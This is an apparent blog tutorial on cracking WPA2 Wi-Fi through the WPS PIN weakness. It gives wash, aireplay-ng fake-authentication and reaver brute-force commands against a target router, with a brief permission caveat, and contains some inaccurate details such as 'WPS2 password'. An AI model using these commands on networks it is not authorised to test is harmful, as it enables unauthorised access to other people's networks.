In this post, I will be discussing what is a WPA2 password and how to crack it using kali Linux in a virtual box.

What is WPA2 password ?

1. WPA2 refers to WiFi Protected Access 2.
2. It came after the WEP as WEP was easy to crack and was less secure compared to WPA2.
3. WPA2 uses a different approach to protect its password as it is based on IEEE 802.11i when it is sent in the air.
4. It also becomes more secure as it used AES (Advanced Encryption Standard) method of encryption for its passwords.
5. A WPA2 key is a 64 hexadecimal key which further enhances the security.

But there is a flaw in WPA2 i.e the WPS(WiFi Protected Setup) feature. It was originally introduced to ease people's life so they can easily connect to wireless printers, scanners etc.

But now it has become a loophole and if it is misconfigured then we can very easily crack the WPS2 password

Limitation of WPS feature in WPA2

1. In the WPS method the authentication is done by an 8-digit pin.
2. As 8 digits is a very small number so we can try all possible pins in a relatively short amount of time
3. The WPS pin then can be used to find the original password also 
4. If the router uses PBC (Push Button Configuration) then the attack will fail

Now first we will enable monitor mode on our external WiFi adapter. If you do not know how to enable monitor mode on your external WiFi adapter then you can see my post below and easily learn it.

Once monitor mode is enabled you can now continue.

First, we will find all the routers in our range that have the WPS enabled. But please see you have permission to attack the router or use your router. In the tutorial below I have used my router on which I have full permissions.

>> wash - - interface wlan0

Press Ctrl + c to stop the command.

>> aireplay-ng - - fakeauth 30 -a (MAC address of target) -h (MAC address of your adapter which you can get by doing ifconfig and then taking first six character of it and replacing "-" with ":") wlan0

But don’t execute it now wait.

First in a new window enter the command below and execute it.

>>  reaver - - bssid xxxxxxxxxx - - channel x - - interface wlan0 -vvv - -no-associate

vvv - tells what is happening during the command and displays information so we can find if any error occurs

no-associate - tells the reaver not to associate with the MAC address as we will do it manually.

Now after executing this command then execute the aireplay command of fakeauthentication.

Now we will wait and let it do the work till our PIN is found. But if you are not able to find the pin then most probably the WPS is enabled correctly and we will further discuss how to handle this situation.

Also, do not let your curiosity fade away and increase your knowledge and skills on networking and ethical hacking only on Hackers Paradise. Click below to learn more :

If you are interested and want to know more about reaver you can see it on the link below 👇